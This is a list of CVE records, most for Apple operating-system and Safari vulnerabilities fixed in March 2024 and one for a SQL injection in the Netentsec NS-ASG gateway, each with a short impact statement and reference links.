CVE 2024 23291 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A malicious app may be able to observe user data in log entries related to accessibility notifications. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23290 Candidate A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 2329 Candidate A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/list_resource_icon.php?action=delete. The manipulation of the argument IconId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256280 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256280 | MISC:VDB-256280 | Netentsec NS-ASG Application Security Gateway sql injection | URL:https://vuldb.com/?id.256280 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-list_resource_icon.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-list_resource_icon.md Assigned (20240308)
CVE 2024 23289 Candidate A lock screen issue was addressed with improved state management. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A person with physical access to a device may be able to use Siri to access private calendar information. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23288 Candidate This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to elevate privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23287 Candidate A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23286 Candidate A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. Processing an image may lead to arbitrary code execution. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23285 Candidate This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sonoma 14.4. An app may be able to create symlinks to protected regions of the disk. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23284 Candidate A logic issue was addressed with improved state management. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. FEDORA:FEDORA-2024-7ee03010c5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/ | FEDORA:FEDORA-2024-ee43b83290 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/ | MISC:http://seclists.org/fulldisclosure/2024/Mar/20 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | MISC:http://seclists.org/fulldisclosure/2024/Mar/21 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:http://seclists.org/fulldisclosure/2024/Mar/24 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | MISC:http://seclists.org/fulldisclosure/2024/Mar/25 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:http://seclists.org/fulldisclosure/2024/Mar/26 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23283 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, macOS Monterey 12.7.4, macOS Sonoma 14.4, macOS Ventura 13.6.5. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23281 Candidate This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.4. An app may be able to access sensitive user data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23280 Candidate An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user. FEDORA:FEDORA-2024-7ee03010c5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/ | FEDORA:FEDORA-2024-ee43b83290 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/ | FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23279 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23278 Candidate The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to break out of its sandbox. CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23277 Candidate The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23276 Candidate A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23275 Candidate A race condition was addressed with additional validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to access protected user data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23274 Candidate An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23273 Candidate This issue was addressed through improved state management. This issue is fixed in Safari 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Private Browsing tabs may be accessed without authentication. FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23272 Candidate A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. A user may gain access to protected parts of the file system. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23270 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, tvOS 17.4. An app may be able to execute arbitrary code with kernel privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 Assigned (20240112)
CVE 2024 23269 Candidate A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23267 Candidate The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to bypass certain Privacy preferences. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23266 Candidate The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23265 Candidate A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to cause unexpected system termination or write kernel memory. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23264 Candidate A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An application may be able to read restricted memory. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
CVE 2024 23263 Candidate A logic issue was addressed with improved validation. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. FEDORA:FEDORA-2024-7ee03010c5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/ | FEDORA:FEDORA-2024-ee43b83290 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/ | FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23262 Candidate This issue was addressed with additional entitlement checks. This issue is fixed in visionOS 1.1, iOS 17.4 and iPadOS 17.4, iOS 16.7.6 and iPadOS 16.7.6. An app may be able to spoof system notifications and UI. FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
